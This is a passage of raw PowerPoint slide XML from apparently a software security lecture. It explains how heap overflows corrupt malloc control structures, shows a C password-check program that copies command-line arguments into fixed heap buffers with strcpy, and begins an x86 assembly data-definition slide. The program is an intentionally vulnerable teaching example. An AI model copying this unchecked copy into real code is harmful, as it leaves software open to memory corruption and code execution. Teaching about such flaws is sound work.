              </a:rPr>
              <a:t>, O_RDONLY);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      count = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      write(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>while(count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> == BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1227450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2980" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where is Overwritten: Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022981" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is the area of memory that is dynamically allocated through the “malloc” family of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>malloc(), calloc(), realloc(), free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>new(), delete()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>functions that return dynamically allocated memory, e.g., strdup()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap grows towards higher memory addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory allocated on the heap survives the function that created it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1653118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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Heap Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory management is done through in-band control structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>These control structures can be manipulated through heap overflows to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture/OS-dependent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some attacks depend on the library used for heap management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Doug Lea’s malloc library: dlmalloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2024460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3220" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033221" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define BUFSIZE 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define DEBUG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int main(int argc, char* argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *passwd = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *username = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  struct passwd* entry = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *salt = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (argc &lt; 3) {...}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(username, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(passwd, argv[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  entry = getpwnam(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (entry == NULL) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "Wrong username %s\n”, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (strncmp(entry-&gt;pw_passwd, "$1$", 3)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "No MD5 password available\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033222" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> salt = entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, (char *)crypt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, salt))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, "Wrong password %s for user %s\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1346971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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data Definition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hexadecimal numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data objects are defined in a data segment using the syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>label     type    data1, data2, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Types can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB: Byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DW: Word (16 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DD: Double word (32 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DQ: Quad word (64 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
